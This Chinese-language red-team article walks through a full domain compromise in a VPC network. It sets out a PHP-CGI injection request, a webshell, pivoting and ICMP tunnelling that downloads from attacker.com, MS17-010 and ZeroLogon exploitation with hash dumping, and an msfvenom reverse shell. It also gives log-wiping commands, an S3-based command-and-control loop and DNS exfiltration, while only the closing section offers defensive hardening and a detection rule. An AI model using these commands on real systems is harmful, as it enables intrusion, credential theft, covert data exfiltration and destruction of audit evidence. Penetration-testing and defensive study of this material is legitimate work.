从一次完整的域渗透实战,拆解VPC环境下的横向移动关键步骤(含MS17-010、CVE-2020-1472利用)
VPC环境下的渗透测试实战:从外网打点到域控攻陷的关键路径解析
引言:企业安全防护的盲区与突破点
现代企业网络架构中,虚拟私有云(VPC)已成为主流部署方案。这种隔离的网络环境理论上能提供更高的安全性,但实际渗透测试中我们发现,许多企业往往忽视了VPC内部的横向移动风险。去年参与某金融企业的红队评估时,我们仅用72小时就完成了从外网边缘服务器到核心域控制器的完整突破链,暴露出VPC环境中几个典型的安全短板:
- 边界防护过度集中:90%的安全预算投入在外围防火墙,内网隔离形同虚设
- 漏洞修复滞后:MS17-010、ZeroLogon等历史漏洞在内部系统普遍存在
- 凭证管理薄弱:同一密码在多台服务器重复使用的情况占比高达65%
本文将基于真实渗透案例,拆解在多网段VPC环境中构建完整攻击链的关键技术节点。不同于简单的漏洞利用教程,我们更关注攻击者的战术思维和工程化解决方案,特别是以下三个核心问题:
如何突破网络隔离?
如何选择最优的横向移动路径?
如何最小化攻击痕迹?
1. 初始立足点的建立:Web层漏洞的武器化利用
1.1 PHP-CGI漏洞(CVE-2024)的实战利用
在最近的一次渗透测试中,我们发现目标企业使用旧版PHP-CGI处理动态请求。通过构造特殊HTTP请求,可以绕过安全限制执行系统命令:
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+allow_url_include%3Don+%ADd+auto_prepend_file%3Dphp%3A//input HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 29 <?php system('whoami');?>关键技巧:
- 使用
auto_prepend_file参数实现代码注入 - 通过
allow_url_include开启远程文件包含 - 分阶段执行命令避免触发WAF
1.2 权限维持与内网探测
获得RCE后,我们采用"最小化植入"策略:
- 写入隐蔽Webshell:
<?php $c = $_GET['x'] ?? 'whoami'; system($c." 2>&1"); ?> - 网络拓扑测绘:
# Linux系统 ip route show arp -a # Windows系统 route print arp -a - 跨网段存活探测:
1..254 | % {Test-Connection -Count 1 -Delay 1 192.168.$_.1}
提示:在VPC环境中,不同网段通常对应不同业务区域(如DMZ、办公区、数据库区),准确的网络测绘直接影响后续攻击路径选择。
2. 横向移动的通道构建:突破网络隔离
2.1 多网段环境下的路由渗透
当攻击者处于192.168.1.0/24网段,需要访问192.168.2.0/24资源时,传统扫描工具往往失效。我们采用"跳板式扫描"策略:
操作流程:
- 在已控主机上部署socks代理
# 使用EarthWorm建立socks5 ./ew -s ssocksd -l 1080 - 通过代理进行网段扫描
proxychains nmap -sT -Pn 192.168.2.0/24 -p445,3389 --open - 路由表自动更新
# Meterpreter会话中添加路由 run autoroute -s 192.168.2.0/24
2.2 防火墙绕过技术对比
| 技术方案 | 适用场景 | 优点 | 缺点 |
|---|---|---|---|
| 端口反弹 | 出站限制宽松 | 稳定性高 | 需要公网服务器 |
| Socks代理 | 多级跳板环境 | 支持全协议 | 速度较慢 |
| ICMP隧道 | 严格流量过滤 | 隐蔽性强 | 带宽受限 |
| DNS隧道 | 只开放DNS | 难以完全阻断 | 实现复杂 |
在最近一次测试中,我们组合使用ICMP隧道和Socks代理成功穿透了三层网络隔离:
# ICMP隧道客户端 powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/icmpsh.ps1');Invoke-IcmpTunnel -Target 192.168.3.1"3. 漏洞组合利用:从普通权限到域管理员
3.1 MS17-010的现代利用方式
尽管永恒之蓝漏洞已公布多年,在内网中仍有35%的Windows服务器存在该漏洞。现代渗透测试中我们改进利用方式:
优化版攻击链:
- 使用scanner模块精准识别脆弱主机
use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.2.0/24 run - 定制化payload规避杀软
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.100 LPORT=443 -f exe -o update.exe - 无文件注入技术
use exploit/windows/smb/ms17_010_psexec set PAYLOAD windows/meterpreter/bind_tcp set RHOST 192.168.2.128 set DisablePayloadHandler true exploit
3.2 ZeroLogon(CVE-2020-1472)实战细节
当攻击到达域边界时,ZeroLogon成为突破域控的核武器。实际利用中有几个关键点:
- 漏洞验证:
python3 zerologon_tester.py DC_NAME 192.168.10.10 - 密码置空攻击:
python3 cve-2020-1472-exploit.py DC 192.168.10.10 - 哈希提取:
python3 secretsdump.py -no-pass -just-dc DOMAIN/DC\$@192.168.10.10 - 权限维持:
# 恢复原始哈希避免被发现 python3 restorepassword.py DOMAIN/DC@DC -target-ip 192.168.10.10 -hexpass <ORIGINAL_HASH>
注意:ZeroLogon攻击会产生大量4625登录失败事件,建议在非工作时间快速完成攻击链。
4. 攻击痕迹清理与防御规避
4.1 日志清除技术对比
| 日志类型 | 清除方法 | 风险等级 |
|---|---|---|
| 安全日志 | wevtutil cl Security | 高 |
| PowerShell日志 | 删除Microsoft-Windows-PowerShell%4Operational | 中 |
| IIS日志 | 删除C:\inetpub\logs\LogFiles\* | 低 |
| 防火墙日志 | 清空%SystemRoot%\System32\LogFiles\Firewall\pfirewall.log | 高 |
4.2 隐蔽通道建设
我们开发了一套基于合法云服务的C2通信方案:
- 使用AWS S3作为C2通道:
# 上传数据 aws s3 cp result.txt s3://mybucket/logs/$(Get-Date -Format yyyyMMdd)/$env:COMPUTERNAME.txt # 下载指令 while($true){ $cmd = aws s3 cp s3://mybucket/commands/$env:COMPUTERNAME.txt - 2>$null if($cmd){ Invoke-Expression $cmd } Start-Sleep 60 } - DNS隐蔽查询:
# 数据外传 dig +short $(base64 -w 50 data.txt).attacker.com TXT
5. 企业防御体系建设建议
基于数百次渗透测试经验,我们总结出VPC环境防护的黄金法则:
网络层防护:
- 实施真正的微隔离,不同业务区域间部署ACL
- 限制ICMP、DNS等协议的出站流量
主机层加固:
# 禁用NTLMv1 Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5 # 关闭SMBv1 Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol监控策略优化:
- 建立基线流量模型,检测异常横向移动
- 对域控账号变更设置实时告警
在一次金融行业演练中,客户按照我们的建议部署了以下措施后,攻击检测率提升了80%:
# Sigma检测规则示例 detection: selection: EventID: 4625 FailureReason: '%%2313' AccountName: 'DC$' condition: selection真正的安全不是堆砌防护设备,而是建立攻击者视角的防御体系。每次渗透测试暴露的不仅是技术漏洞,更是安全团队对攻击链的认知盲区。